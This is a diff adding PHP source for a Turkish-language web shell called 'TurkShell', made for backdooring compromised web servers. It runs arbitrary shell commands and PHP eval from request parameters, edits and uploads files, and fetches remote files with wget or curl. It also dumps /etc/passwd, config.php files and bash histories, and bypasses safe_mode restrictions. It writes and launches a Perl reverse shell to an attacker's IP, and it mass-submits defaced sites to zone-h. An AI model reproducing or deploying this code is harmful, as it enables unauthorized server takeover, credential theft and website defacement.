+if (!show_source($showsc)||!function_exists('show_source')){print "<center><font color=white size=2><b>[ Sorry can't complete the operation ]</font></center>";die();}print "</td></tr></table>";die();}}if ($dlink=='showsrc'){
+print "<p><b>: TurkShell Php editörüyle istediğiniz bir php dosyasını görüntüleyebilmek için, dosya adını bütün dizinleriyle beraber yazınız. :";print "<form method=get>";
+input ("text","showsc","",35);print " ";
+input ("hidden","scdir",$scdir,22);input ("submit","subshsc","Görüntüle","");print $ef; die();}if(isset($_REQUEST['showsc'])){callshsrc(trim($_REQUEST['showsc']));}
+if ($dlink=='cmdhlp'){
+print "<p><b>: Komutu Aşağıya Ekle ve Biz Ne İşe Yaradığı Hakkında Yardımcı Olalım :";print "<form method=get>";
+input ("text","hlp","",35);print " "; 
+input ("submit","","Yardım","");print $ef; die();}
+if (isset ($_REQUEST['hlp'])){$hlp=$_REQUEST['hlp'];
+print "<p><b>[ Yazılan Komut: $sfnt".$hlp."$efnt ]";
+$hlp = escapeshellcmd($hlp);print "<p><table width=100% height=30% bgcolor=#FF0000 border=2><tr><td>";
+if (!function_exists(shell_exec)&&!function_exists(exec)&&
+!function_exists(popen)&&!function_exists(system)&&!function_exists(passthru))
+{print "<center><font color=white size=2><b>[ Sorry can't complete the operation ]</font></center>";}else {print "<pre><font color=white>";
+if(!callfuncs("man $hlp | col -b")){print "<center><font size=2><b>[ Bitti. ]";}print "</pre></font>";}print "</td></tr></table>";die();}
+if (isset($_REQUEST['indx'])&&!empty($_REQUEST['indxtxt']))
+{if (touch ($_REQUEST['indx'])==true){
+$fp=fopen($_REQUEST['indx'],"w+");fwrite ($fp,stripslashes($_REQUEST['indxtxt']));
+fclose($fp);print "<p>[ $sfnt".$_REQUEST['indx']."$efnt created successfully !! ]</p>";print "<b><center>[ <a href='javascript:history.back()'>Yeniden Editle</a>
+] -- [<a href=".inclink('dlink', 'scurrdir')."&scdir=$nscdir> Curr-Dir </a>]</center></b>";die(); }else {print "<p>[ Sorry, Can't create the index !! ]</p>";die();}}
+if ($dlink=='qindx'&&!isset($_REQUEST['qindsub'])){
+print $sf."<br>";print "<p><textarea cols=50 rows=10 name=indxtxt>
+İndex kodlarını buraya yaz</textarea></p>";
+input ("text","indx","İndex Adı",35);print " ";
+input ("submit","qindsub","OluÅŸtur","");print $ef;die();}
+if (isset ($_REQUEST['mailsub'])&&!empty($_REQUEST['mailto'])){
+$mailto=$_REQUEST['mailto'];$subj=$_REQUEST['subj'];$mailtxt=$_REQUEST['mailtxt'];
+if (mail($mailto,$subj,$mailtxt)){print "<p>[ Mail sended to $sfnt".$mailto." $efnt successfully ]</p>"; die();}else {print "<p>[ Error, Can't send the mail ]</p>";die();}} elseif(isset ($mailsub)&&empty($mailto)) {print "<p>[ Error, Can't send the mail ]</p>";die();}
+if ($dlink=='mail'&&!isset($_REQUEST['mailsub'])){
+print $sf."<br>";print "<p><textarea cols=50 rows=10 name=mailtxt>
+Mesajını buraya yaz</textarea></p>";input ("text","mailto","mail adresi",35);print " ";input ("text","subj","Başlık",20);print " ";
+input ("submit","mailsub","Gönder","");print $ef;die();}
+if (isset($_REQUEST['zonet'])&&!empty($_REQUEST['zonet'])){callzone($nscdir);}
+function callzone($nscdir){
+if (is_writable($nscdir)){$fpz=fopen ("z.pl","w");$zpl='z.pl';$li="bklist.txt";}
+else {$fpz=fopen ("/tmp/z.pl","w");$zpl='/tmp/z.pl';$li="/tmp/bklist.txt";}
+fwrite ($fpz,"\$arq = @ARGV[0];
+\$grupo = @ARGV[1];
+chomp \$grupo;
+open(a,\"<\$arq\");
+@site = <a>;
+close(a);
+\$b = scalar(@site);
+for(\$a=0;\$a<=\$b;\$a++)
+{chomp \$site[\$a];
+if(\$site[\$a] =~ /http/) { substr(\$site[\$a], 0, 7) =\"\"; }
+print \"[+] Sending \$site[\$a]\n\";
+use IO::Socket::INET;
+\$sock = IO::Socket::INET->new(PeerAddr => \"old.zone-h.org\", PeerPort => 80, Proto => \"tcp\") or next;
+print \$sock \"POST /en/defacements/notify HTTP/1.0\r\n\";
+print \$sock \"Accept: */*\r\n\";
+print \$sock \"Referer: http://old.zone-h.org/en/defacements/notify\r\n\";
+print \$sock \"Accept-Language: pt-br\r\n\";
+print \$sock \"Content-Type: application/x-www-form-urlencoded\r\n\";
+print \$sock \"Connection: Keep-Alive\r\n\";
+print \$sock \"User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\r\n\";
+print \$sock \"Host: old.zone-h.org\r\n\";
+print \$sock \"Content-Length: 385\r\n\";
+print \$sock \"Pragma: no-cache\r\n\";
+print \$sock \"\r\n\";
+print \$sock \"notify_defacer=\$grupo&notify_domain=http%3A%2F%2F\$site[\$a]&notify_hackmode=22&notify_reason=5&notify=+OK+\r\n\";
+close(\$sock);}");
+if (touch ($li)==true){$fpl=fopen($li,"w+");fwrite ($fpl,$_REQUEST['zonetxt']);
+}else{print "<p>[ Can't complete the operation, try change the current dir with writable one ]<br>";}$zonet=$_REQUEST['zonet'];
+if (!function_exists(exec)&&!function_exists(shell_exec)&&!function_exists(popen)&&!function_exists(system)&&!function_exists(passthru))
+{print "[ Can't complete the operation !! ]";}
+else {callfuncs("chmod 777 $zpl;chmod 777 $li");
+ob_start();callfuncs("perl $zpl $li $zonet");ob_clean();
+print "<p>[ All sites should be sended to zone-h.org successfully !! ]";die();}
+}if ($dlink=='zone'&&!isset($_REQUEST['zonesub'])){
+print $sf."<br>";print "<p><pre><textarea cols=50 rows=10 name=zonetxt>
+www.site1.com
+www.site2.com
+</textarea></pre></p>";input ("text","zonet","Hacker-name",35);print " ";
+input ("submit","zonesub","Send","");print $ef;die();}
+print "</div></b></center>"; print"</td></tr>";print"</table>";print "<br>";
+function inisaf($iniv) { $chkini=ini_get($iniv);
+if(($chkini || strtolower($chkini)) !=='on'){print"<font color=red ><b>Safe Mod Kapalı Gözüküyor. Ancak Engelli Fonksiyonlar Bulunabilir.</b></font>";} else{
+print"<font color=red><b>Açık ( Güvenli )</b></font>";}}function inifunc($inif){$chkin=ini_get($inif);
+if ($chkin==""){print " <font color=red><b>Yok</b></font>";}
+else {$nchkin=wordwrap($chkin,40,"\n", 1);print "<b><font color=red  >".$nchkin."</font></b>";}}function callocmd($ocmd,$owhich){if(function_exists(exec)){$nval=exec($ocmd);}elseif(!function_exists(exec)){$nval=shell_exec($ocmd);}
+elseif(!function_exists(shell_exec)){$opop=popen($ocmd,'r');
+while (!feof($opop)){ $nval= fgetc($opop);}}
+elseif(!function_exists(popen)){ ob_start();system($ocmd);$nval=ob_get_contents();ob_clean();}elseif(!function_exists(system)){
+ob_start();passthru($ocmd);$nval=ob_get_contents();ob_clean();}
+if($nval=$owhich){print"<font color=red><b>ON</b></font>";}
+else{print"<font color=red  ><b>OFF</b></font>";} }
+print"<table bgcolor=#191919 style=\"border:2px #FF0000 solid ;font-size:13px;font-family:tahoma \" width=100% height=%>"; 
+print"<tr><td>"; print"<center><br>";
+print"<b>Safe-mode :\t";print inisaf('safe_mode');print "</b>";print"</center>"; 
+if (!function_exists(exec)&&!function_exists(shell_exec)&&!function_exists(popen)&&!function_exists(system)&&!function_exists(passthru)||strstr(PHP_OS,"WIN")){print "";}else{print "<table bgcolor=#191919 width=100% height=% style='font-size:13px;font-family:tahoma'><tr><td>"; 
+print "<div align=center>"; print"<br><b>Mysql : </b>"; 
+callocmd('which mysql','/usr/bin/mysql'); 
+print"</td>"; print"<td>"; print"<br><b>Perl : </b>"; 
+callocmd('which perl',('/usr/bin/perl')||'/usr/local/bin/perl');print"</td>"; print"<td>"; print"<br><b>Gcc : </b>"; 
+callocmd('which gcc','/usr/bin/gcc'); print"</td>"; print"<td>"; 
+print"<br><b>Curl : </b>"; callocmd('which curl','/usr/bin/curl'); print"</td>"; print"<td>"; print"<br><b>GET : </b>"; 
+callocmd('which GET','/usr/bin/GET'); 
+print"</td>"; print"<td>";print"<br><b>Wget : </b>"; 
+callocmd('which wget','/usr/bin/wget'); 
+print"</td>"; print"<td>"; print"<br><b>Lynx : </b>"; 
+callocmd('which lynx','/usr/bin/lynx'); 
+print"</td>"; print "</tr></table>"; }print "<hr><br>"; 
+print "<br><table  style=\"border:2px #FF0000 solid \" width=100% height=%>"; print"<tr><td><font size=2 face=tahoma>";
+print "<b>IP Numaranız : ".$REMOTE_ADDR."<br></b>"; 
+print "<b>Server IP Numarası : ".$SERVER_ADDR."</b>";
+print"<br><b>".$SERVER_SIGNATURE."</b>"; 
+print "<b>Server Adı : ".$SERVER_NAME." / "."Email : ".$SERVER_ADMIN."<br></b>"; 
+print "<b>Engelli Fonksiyonlar : </b>";inifunc(disable_functions);print"<br>";
+print "<b>Kimsiniz : <b>"; callfuncs('id');print"<br><b>Os : </b>"; 
+if (strstr( PHP_OS, "WIN")){print php_uname(); print " ";print PHP_OS; }else {
+if (!function_exists(shell_exec)&&!function_exists(exec)&&
+!function_exists(popen)&&!function_exists(system)&&!function_exists(passthru))
+{print php_uname(); print "/";print PHP_OS;}
+else {callfuncs('uname -a');}}print"<br>"; 
+print"Php-versiyon : ".phpversion(); print"<br><b>BulunduÄŸunuz Ana Dizin : </b>";
+print $nscdir."&nbsp;&nbsp;&nbsp;&nbsp; [ ";permcol($nscdir);print " ]";
+print"<br>";print "TurkShell Burada : " .__file__;
+print"<br> Toplam Alan: "; readable_size(disk_total_space($nscdir));print " / ";
+print"Bos Alan: "; readable_size(disk_free_space($nscdir));
+print "</center><br></font>"; print"</td></tr></table><br>"; 
+if (isset($_REQUEST['credir'])) { $ndir=trim($_REQUEST['dir']); 
+if (mkdir( $ndir, 0777 )){ $mess=basename($ndir)." created successfully"; }
+else{$mess="Klasör Oluştur/Sil";}}elseif (isset($_REQUEST['deldir'])) 
+{ $nrm=trim($_REQUEST['dir']);if (is_dir($nrm)&& rmdir($nrm)){$mess=basename($nrm)." deleted successfully"; }else{$mess="Create/Delete Dir";}} 
+else{$mess="Klasör Olustur/Sil";}if(isset($_REQUEST['crefile'])){ 
+$ncfile=trim($_REQUEST['cfile']);
+if (!is_file($ncfile)&&touch($ncfile)){ $mess3=basename($ncfile)." created succefully";unset ($_REQUEST['cfile']);} 
+else{ $mess3= "Dosya Olustur/Sil";}}
+elseif(isset($_REQUEST['delfile'])){ 
+$ndfile=trim($_REQUEST['cfile']); 
+if (unlink($ndfile)) {$mess3=basename($ndfile)." deleted succefully";} 
+else {$mess3= "Dosya Olustur/Sil";}} 
+else {$mess3="Dosya Olustur/Sil";}
+class upload{ function upload($file,$tmp){ 
+$nscdir =(!isset($_REQUEST['scdir']))?getcwd():chdir($_REQUEST['scdir']);$nscdir=getcwd();if (isset($_REQUEST["up"])){ if (empty($upfile)){print "";}
+if (@copy($tmp,$nscdir."/".$file)){ 
+print "<div><center><b><font color=red  > $file </font>dosyası başarıyla yüklenmiştir.</b></center></div>"; }else{print "<center><b>: Error uploading<font color=red> $file </font>: </b></center>";} } } } 
+$obj=new upload($HTTP_POST_FILES['upfile']['name'],$HTTP_POST_FILES['upfile']['tmp_name']); if (isset ($_REQUEST['ustsub'])){
+$ustname=trim ($_REQUEST['ustname']);ob_start();
+if ($_REQUEST['ustools']='t1'){callfuncs('wget '.$ustname);}
+if ($_REQUEST['ustools']='t2'){callfuncs('curl -o basename($ustname) $ustname');}
+if ($_REQUEST['ustools']='t3'){callfuncs('lynx -source $ustname > basename($ustname)');}
+if ($_REQUEST['ustools']='t9'){callfuncs('GET $ustname > basename($ustname)');}
+if ($_REQUEST['ustools']='t4'){callfuncs('unzip '.$ustname);}
+if ($_REQUEST['ustools']='t5'){callfuncs('tar -xvf '.$ustname);}
+if ($_REQUEST['ustools']='t6'){callfuncs('tar -zxvf '.$ustname);}
+if ($_REQUEST['ustools']='t7'){callfuncs('chmod 777 '.$ustname);}
+if ($_REQUEST['ustools']='t8'){callfuncs('make '.$ustname);}ob_clean();}
+if (!isset($_REQUEST['cmd'])&&!isset($_REQUEST['eval'])&&!isset($_REQUEST['rfile'])&&!isset($_REQUEST['edit'])&&!isset($_REQUEST['subqcmnds'])&&!isset ($_REQUEST['safefile'])&&!isset ($_REQUEST['inifile'])&&!isset($_REQUEST['bip'])&&
+!isset($_REQUEST['rfiletxt'])){
+if ($dh  = dir($nscdir)){ while (true == ($filename =$dh->read())){ 
+$files[] = $filename; sort($files);}print "<br>"; 
+print"<center><table bgcolor=#2A2A2A style=\"border:1px solid white\" width=100% height=6% ></center>"; 
+print "<tr><td width=43% style=\"border:1px solid white\">"; 
+print "<center><b>Dosyalar";print "</td>"; 
+print "<td width=8% style=\"border:1px solid white\">";print "<center><b>Boyutlar";print "</td>"; 
+print "<td width=3% style=\"border:1px solid white\">";print "<center><b>Yazma";print "</td>"; 
+print "<td width=3% style=\"border:1px solid white\">";print "<center><b>Okuma";print "</td>"; 
+print "<td width=5% style=\"border:1px solid white\">";print "<center><b>Tür";print "</td>"; 
+print "<td width=5% style=\"border:1px solid white\">";print "<center><b>Düzenleme";print "</td>";
+print "<td width=5% style=\"border:1px solid white\">";print "<center><b>Adlandırma";print "</td>";
+print "<td width=6% style=\"border:1px solid white\">";print "<center><b>Ä°ndir";print "</td>";if(strstr(PHP_OS,"Linux")){
+print "<td width=8% style=\"border:1px solid white\">";print "<center><b>Grup";print "</td>";}
+print "<td width=8% style=\"border:1px solid white\">";print "<center><b>Ä°zinler";print "</td></tr>"; foreach ($files as $nfiles){ 
+if (is_file("$nscdir/$nfiles")){ $scmess1=filesize("$nscdir/$nfiles");}
+if (is_writable("$nscdir/$nfiles")){ 
+$scmess2= "<center><font color=red  >Evet";}else {$scmess2="<center><font color=red>Hayir";}if (is_readable("$nscdir/$nfiles")){ 
+$scmess3= "<center><font color=red  >Evet";}else {$scmess3= "<center><font color=red>Hayir";}if (is_dir("$nscdir/$nfiles")){$scmess4= "<font color=red><center>Klasör";}else{$scmess4= "<center><font color=red  >Dosya";}  
+print"<tr><td style=\"border:1px solid white\">"; 
+if (is_dir($nfiles)){print "<font face= tahoma size=2 color=red  >[ $nfiles    ]<br>";}else {print "<font face= tahoma size=2 color=#FF0000>$nfiles <br>";}
+print"</td>"; print "<td style=\"border:1px solid white\">"; 
+print "<center><font face= tahoma size=2 color=#FF0000>";
+if (is_dir("$nscdir/$nfiles")){print "<b>K</b>lasör";}
+elseif(is_file("$nscdir/$nfiles")){readable_size($scmess1);}else {print "---";}
+print "</td>"; print "<td style=\"border:1px solid white\">"; 
+print "<center><font face= tahoma size=2 >$scmess2"; print "</td>"; 
+print"<td style=\"border:1px solid white\">"; 
+print "<center><font face= tahoma size=2 >$scmess3"; print "</td>"; 
+print "<td style=\"border:1px solid white\">"; 
+print "<center><font face= tahoma size=2 >$scmess4"; print"</td>";
+print "<td style=\"border:1px solid white\">";if(is_file("$nscdir/$nfiles")){
+print " <center><a href=".inclink('dlink', 'edit')."&edit=$nfiles&scdir=$nscdir>Düzenle</a>";}else {print "<center><font face=tahoma size=2 color=gray>Düzenle</center>";}print"</td>";  print "<td style=\"border:1px solid white\">";print " <center><a href=".inclink('dlink', 'ren')."&ren=$nfiles&scdir=$nscdir>Adlandir</a>";print"</td>";print "<td style=\"border:1px solid white\">";
+if(is_file("$nscdir/$nfiles")){
+print " <center><a href=".inclink('dlink', 'dwld')."&dwld=$nfiles&scdir=$nscdir>indir</a>";}else {print "<center><font face=tahoma size=2 color=gray>indir</center>";}print"</td>"; if(strstr(PHP_OS,"Linux")){
+print "<td style=\"border:1px solid white\">";
+print "<center><font face=tahoma size=2 color=#FF0000>";owgr($nfiles);
+print "</center>";print"</td>";} 
+print "<td style=\"border:1px solid red  \">";print "<center><div>";
+permcol("$nscdir/$nfiles");print "</div>";print"</td>"; print "</tr>"; 
+}print "</table>";print "<br>";}else {print "<div><br><center><b>[ Ä°zin Verilmiyor. ]<p>";}}
+elseif (!isset($_REQUEST['rfile'])&&isset($_REQUEST['cmd'])||isset($_REQUEST['eval'])||isset($_REQUEST['subqcmnds'])){
+if (!isset($_REQUEST['rfile'])&&isset($_REQUEST['cmd'])){print "<div><b><center>[ Executed command ][$] : ".$_REQUEST['cmd']."</div></center>";}
+print "<pre><center>".$sta;
+if (isset($_REQUEST['cmd'])){$cmd=trim($_REQUEST['cmd']);callfuncs($cmd);}
+elseif(isset($_REQUEST['eval'])){
+ob_start();eval(stripslashes(trim($_REQUEST['eval'])));
+$ret = ob_get_contents();ob_clean();print htmlspecialchars($ret);}
+elseif (isset($_REQUEST['subqcmnds'])){
+if ($_REQUEST['uscmnds']=='op1'){callfuncs('ls -lia');}
+if ($_REQUEST['uscmnds']=='op2'){callfuncs('cat /etc/passwd');}
+if ($_REQUEST['uscmnds']=='op3'){callfuncs('cat /var/cpanel/accounting.log');}
+if ($_REQUEST['uscmnds']=='op4'){callfuncs('ls /var/named');}
+if ($_REQUEST['uscmnds']=='op11'){callfuncs('find ../ -type d -perm -2 -ls');}
+if ($_REQUEST['uscmnds']=='op12'){callfuncs('find ./ -type d -perm -2 -ls');}
+if ($_REQUEST['uscmnds']=='op5'){callfuncs('find ./ -name service.pwd ');}
+if ($_REQUEST['uscmnds']=='op6'){callfuncs('find ./ -name config.php');}
+if ($_REQUEST['uscmnds']=='op7'){callfuncs('find / -type f -name .bash_history');}
+if ($_REQUEST['uscmnds']=='op8'){callfuncs('cat /etc/hosts');}
+if ($_REQUEST['uscmnds']=='op9'){callfuncs('finger root');}
+if ($_REQUEST['uscmnds']=='op10'){callfuncs('netstat -an | grep -i listen');}
+if ($_REQUEST['uscmnds']=='op13'){callfuncs('cat /etc/services');}
+}print $eta."</center></pre>";}
+function rdread($nscdir,$sf,$ef){$rfile=trim($_REQUEST['rfile']);
+if(is_readable($rfile)&&is_file($rfile)){ 
+$fp=fopen ($rfile,"r");print"<center>";
+print "<div><b>[ Editing <font color=red  >".basename($rfile)."</font> ] [<a href='javascript:history.back()'> Geri </a>] [<a href=".inclink('dlink','rdcurrdir')."&scdir=$nscdir> Curr-Dir </a>]</b></div><br>"; 
+print $sf."<textarea cols=157 rows=23 name=rfiletxt>"; 
+while (!feof($fp)){$lines = fgetc($fp);
+$nlines=htmlspecialchars($lines);print $nlines;}
+fclose($fp);print "</textarea>";if (is_writable($rfile)){
+print "<center><input type=hidden value=$rfile name=hidrfile><input type=submit value='Kaydet' > <input type=reset value='Reset' ></center>".$ef;}else 
+{print "<div><b><center>[ Can't edit <font color=red  >".basename($rfile)."</font> ]</center></b></div><br>";}print "</center><br>";}
+elseif (!file_exists($_REQUEST['rfile'])||!is_readable($_REQUEST['rfile'])||$_REQUEST['rfile']=$nscdir){print "<div><b><center>[ Safe Mod kapalı olduğu halde, engelli fonksiyonlar bulunduğundan dolayı isteğinize cevap verilememektedir. ]</center></b></div><br>";}}
+function rdsave($nscdir){$hidrfile=trim($_REQUEST['hidrfile']);
+if (is_writable($hidrfile)){$rffp=fopen ($hidrfile,"w+");
+$rfiletxt=stripslashes($_REQUEST['rfiletxt']);
+fwrite ($rffp,$rfiletxt);print "<div><b><center>
+[ <font color=red >".basename($hidrfile)."</font> Başarıyla Düzenlendi. ]
+[<a href=".inclink('dlink','rdcurrdir')."&scdir=$nscdir> Curr-Dir </a>] [<a href='javascript:history.back()'> Edit again </a>]
+</center></b></div><br>";fclose($rffp);}
+else {print "<div><b><center>[ Can't save the file !! ] [<a href=".inclink('dlink','rdcurrdir')."&scdir=$nscdir> Curr-Dir </a>] [<a href='javascript:history.back()'> Back </a>]</center></b></div><br>";}} 
+if (isset ($_REQUEST['rfile'])&&!isset($_REQUEST['cmd'])){rdread($nscdir,$sf,$ef);}
+elseif (isset($_REQUEST['rfiletxt'])){rdsave($nscdir);}
+function callperms($chkperms){
+$perms = fileperms($chkperms);
+if (($perms & 0xC000) == 0xC000) {
+   // Socket
+   $info = 's';
+} elseif (($perms & 0xA000) == 0xA000) {
+   // Symbolic Link
+   $info = 'l';
+} elseif (($perms & 0x8000) == 0x8000) {
+   // Regular
+   $info = '-';
+} elseif (($perms & 0x6000) == 0x6000) {
+   // Block special
+   $info = 'b';
+} elseif (($perms & 0x4000) == 0x4000) {
+   // Directory
+   $info = 'd';
+} elseif (($perms & 0x2000) == 0x2000) {
+   // Character special
+   $info = 'c';
+} elseif (($perms & 0x1000) == 0x1000) {
+   // FIFO pipe
+   $info = 'p';
+} else {
+   // Unknown
+   $info = 'u';
+}
+
+// Owner
+$info .= (($perms & 0x0100) ? 'r' : '-');
+$info .= (($perms & 0x0080) ? 'w' : '-');
+$info .= (($perms & 0x0040) ?
+           (($perms & 0x0800) ? 's' : 'x' ) :
+           (($perms & 0x0800) ? 'S' : '-'));
+
+// Group
+$info .= (($perms & 0x0020) ? 'r' : '-');
+$info .= (($perms & 0x0010) ? 'w' : '-');
+$info .= (($perms & 0x0008) ?
+           (($perms & 0x0400) ? 's' : 'x' ) :
+           (($perms & 0x0400) ? 'S' : '-'));
+
+// World
+$info .= (($perms & 0x0004) ? 'r' : '-');
+$info .= (($perms & 0x0002) ? 'w' : '-');
+$info .= (($perms & 0x0001) ?
+           (($perms & 0x0200) ? 't' : 'x' ) :
+           (($perms & 0x0200) ? 'T' : '-'));    print $info;}
+
+		  function readable_size($size) {
+
+if ($size < 1024) {
+print $size . ' B';
+}else {$units = array("kB", "MB", "GB", "TB");
+foreach ($units as $unit) {
+$size = ($size / 1024);
+if ($size < 1024) {break;}}printf ("%.2f",$size);print ' ' . $unit;}}
+if($dlink=='ren'&&!isset($_REQUEST['rensub'])){
+print "<div><b><center>[<a href=".$PHP_SELF."?scdir=$nscdir> Geri </a>]</div>";
+print "<center>".$sf;input ("text","ren",$_REQUEST['ren'],20);print " ";
+input ("text","renf","New-name",20);print " ";
+input ("submit","rensub","Rename" ,"");print $ef;die();}else print "";
+if (isset ($_REQUEST['ren'])&&isset($_REQUEST['renf'])){
+if (rename($nscdir."/".$_REQUEST['ren'],$nscdir."/".$_REQUEST['renf'])){
+print"<center><div><b>[ ". $_REQUEST['ren']." is renamed to " .$sfnt.$_REQUEST['renf'].$efnt." successfully ]</center></div></b>";print "<div><b><center>[<a href=".inclink('dlink', 'rcurrdir')."&scdir=$nscdir> Curr-dir </a>]</div>";die();}else{print "<div><b><center>[ Yeniden Adlandirilamiyor ]</div>";
+print "<div><b><center>[<a href=".inclink('dlink', 'rcurrdir')."&scdir=$nscdir> Geri </a>]</div>";die();}}function fget($nscdir,$sf,$ef){print "<center>";
+print "<div><b>[ Düzenlenen Dosya: <font color=red >".basename($_REQUEST['edit'])."</font> ] [<a href='javascript:history.back()'> Geri </a>] [<a href=".inclink('dlink', 'scurrdir')."&scdir=$nscdir> Curr-Dir </a>]</b></div>";
+print $sf."<textarea cols=157 rows=23 name=edittxt>"; $alltxt= file_get_contents($_REQUEST['edit']);
+$nalltxt=htmlspecialchars($alltxt);print $nalltxt;print "</textarea></center>";
+if (is_writable($_REQUEST['edit'])){
+print "<center><input type=submit value='Save-file' > <input type=reset value='Reset' ></center>".$ef;}else {print "<div><b><center>[ Can't edit 
+<font color=red >".basename($_REQUEST['edit'])."</font> ]</center></b></div><br>";}}function svetxt(){
+$fp=fopen ($_REQUEST['edit'],"w");if (is_writable($_REQUEST['edit'])){
+$nedittxt=stripslashes($_REQUEST['edittxt']);
+fwrite ($fp,$nedittxt);print "<div><b><center>[ <font color=red  >".basename($_REQUEST['edit'])."</font> Saved !! ]</center></b></div>";fclose($fp);}else {print "<div><b><center>[ Can't save the file !! ]</center></b></div>";}}
+if ($dlink=='edit'&&!isset ($_REQUEST['edittxt'])&&!isset($_REQUEST['rfile'])&&!isset($_REQUEST['cmd'])&&!isset($_REQUEST['subqcmnds'])&&!isset($_REQUEST['eval']))
+{fget($nscdir,$sf,$ef);}elseif (isset ($_REQUEST['edittxt']))
+{svetxt();fget($nscdir,$sf,$ef);}else {print "";}function owgr($file){
+$fileowneruid=fileowner($file); $fileownerarray=posix_getpwuid($fileowneruid); 
+$fileowner=$fileownerarray['name']; $fileg=filegroup($file);
+$groupinfo = posix_getgrgid($fileg);$filegg=$groupinfo['name'];
+print "$fileowner/$filegg"; }$cpyf=trim($_REQUEST['cpyf']);$ftcpy=trim($_REQUEST['ftcpy']);$cpmv= $cpyf.'/'.$ftcpy;if (isset ($_REQUEST['cpy'])){
+if (copy($ftcpy,$cpmv)){$cpmvmess=basename($ftcpy)." copied successfully";}else {$cpmvmess="Can't copy ".basename($ftcpy);}}
+elseif(isset($_REQUEST['mve'])){
+if (copy($ftcpy,$cpmv)&&unlink ($ftcpy)){$cpmvmess= basename($ftcpy)." moved successfully";}else {$cpmvmess="Can't move ".basename($ftcpy);}
+}else {$cpmvmess="Kopyala/Taşımak İçin Dosya Seç";}
+if (isset ($_REQUEST['safefile'])){
+$file=$_REQUEST['safefile'];$tymczas="";if(empty($file)){
+if(empty($_GET['file'])){if(empty($_POST['file'])){
+print "<center>[ Please choose a file first to read it using copy() ]</center>";
+} else {$file=$_POST['file'];}} else {$file=$_GET['file'];}}
+$temp=tempnam($tymczas, "cx");if(copy("compress.zlib://".$file, $temp)){
+$zrodlo = fopen($temp, "r");$tekst = fread($zrodlo, filesize($temp));
+fclose($zrodlo);echo "<center><pre>".$sta.htmlspecialchars($tekst).$eta."</pre></center>";unlink($temp);} else {
+print "<FONT COLOR=\"RED\"><CENTER>Uygulamaya esnasında sunucunun yazma izni vermemesinden dolayı işlem başarısız sonuçlandırılmıştır.
+</CENTER></FONT><br>";}}if (isset ($_REQUEST['inifile'])){
+ini_restore("safe_mode");ini_restore("open_basedir");
+print "<center><pre>".$sta;
+if (include(htmlspecialchars($_REQUEST['inifile']))){}else {print "Sorry, can't read the selected file !!";}print $eta."</pre></center>";}
+if (isset ($_REQUEST['bip'])&&isset ($_REQUEST['bport'])){callback($nscdir,$_REQUEST['bip'],$_REQUEST['bport']);}
+function callback($nscdir,$bip,$bport){
+if(strstr(php_os,"WIN")){$epath="cmd.exe";}else{$epath="/bin/sh";}
+if (is_writable($nscdir)){
+$fp=fopen ("back.pl","w");$backpl='back.pl';}
+else {$fp=fopen ("/tmp/back.pl","w");$backpl='/tmp/back.pl';}
+fwrite ($fp,"use Socket;
+\$system='$epath';
+\$sys= 'echo \"[ Operating system ][$]\"; echo \"`uname -a`\";
+echo \"[ Curr DIR ][$]\"; echo \"`pwd`\";echo;
+echo \"[ User perms ][$]\";echo \"`id`\";echo;
+echo \"[ Start shell ][$]\";';
+
+if (!\$ARGV[0]) {
+  exit(1);
+}
+\$host = \$ARGV[0];
+\$port = 80;
+if (\$ARGV[1]) {
+  \$port = \$ARGV[1];
+}
+\$proto = getprotobyname('tcp') || die('Unknown Protocol\n');
+socket(SERVER, PF_INET, SOCK_STREAM, \$proto) || die ('Socket Error\n');
+my \$target = inet_aton(\$host);
+if (!connect(SERVER, pack 'SnA4x8', 2, \$port, \$target)) {
+  die('Unable to Connect\n');
+}
+if (!fork( )) {
+  open(STDIN,'>&SERVER');
+  open(STDOUT,'>&SERVER');
+  open(STDERR,'>&SERVER');
+print '\n[ Wardom Bu kodlar Megabros Tarafından kodlanmış Arka pLanı Programlanmıştır ]';
+print '\n[ Wardom ][ Megabrosl ]\n\n'; 
+         system(\$sys);system (\$system);
+          exit(0); }
+		  ");callfuncs("chmod 777 $backpl");
+ob_start();
+callfuncs("perl $backpl $bip $bport");
+ob_clean();
+print "<div><b><center>[ Selected IP is ".$_REQUEST['bip']." and port is ".$_REQUEST['bport']." ]<br>
+[ Check your connection now, if failed try changing the port number ]<br>
+[ Or Go to a writable dir and then try to connect again ]<br>
+[ Return to the Current dir ] [<a href=".inclink('dlink', 'scurrdir')."&scdir=$nscdir> Curr-Dir </a>] 
+</div><br>";}if (isset($_REQUEST['uback'])){
+$uback=$_REQUEST['uback'];$upip=$_REQUEST['upip']; 
+if ($_REQUEST['upports']=="up80"){callfuncs("perl $uback $upip 80");}
+elseif ($_REQUEST['upports']=="up443"){callfuncs("perl $uback $upip 443");}
+elseif ($_REQUEST['upports']=="up2121"){callfuncs("perl $uback $upip 2121");}}
+delm("<font face=Tahoma color=#FFFFFF size=2>Komut Çalıştır");print "<table bgcolor=#2A2A2A style=\"border:2px solid white\" width=100% height=18%>";
+print "<tr><td width=32%><div align=left>";
+print $st.$c1."<center><div><b>".$mess3.$ec; 
+print $c2.$sf."<center>";input("text","cfile","",53);
+input("hidden","scdir",$nscdir,0);print "<br>";
+input("submit","crefile","Olustur","");
+print " ";input("submit","delfile","Sil","");
+print "</center>".$ef.$ec.$et."</div></td>";
+print "<td><div align=center>".$st.$c1;
+print "<center><div><b>Komut Gir";print $ec;
+print $c2.$sf."<center><div style='margin-top:7px'>"; 
+input("text","cmd","",59);input("hidden","scdir",$nscdir,0);print"<br>";
+input("submit","","Gerçekleştir","");print "</center>".$ef.$ec.$et."</div></td>";
+print "<td width=32%><div align=right>";print $st.$c1;
+print "<center><div><b>$mess".$ec.$c2.$sf."<center>";
+input("text","dir","",53);input("hidden","scdir",$nscdir,0);print "<br>";
+input("submit","credir","OluÅŸtur","");print " ";
+input("submit","deldir","Sil","");
+print "</center>".$ef.$ec.$et."</div></td></tr>";
+print "<tr><td width=32%><div align=left>";print $st.$c1;
+print "<center><div><b>Dosya Düzenle/Oku".$ec;print $c2.$sf."<center>";
+input("text","rfile",$nscdir,53);input("hidden","scdir",$nscdir,0);print "<br>";
+input("submit","","Oku-Düzenle","");print "</center>".$ef.$ec.$et."</div></td>";
+print "<td><div align=center>";print $st.$c1;
+print "<center><div><b>Dizin'i Göster<br>";print $ec.$c2.$sf."<center><div style='margin-top:7px'>"; input("text","scdir",$nscdir,59);print"<br>";
+input("submit","","Göster","");print " ";
+input("reset","","R00T","");print "</center>".$ef.$ec.$et."</div></td>";
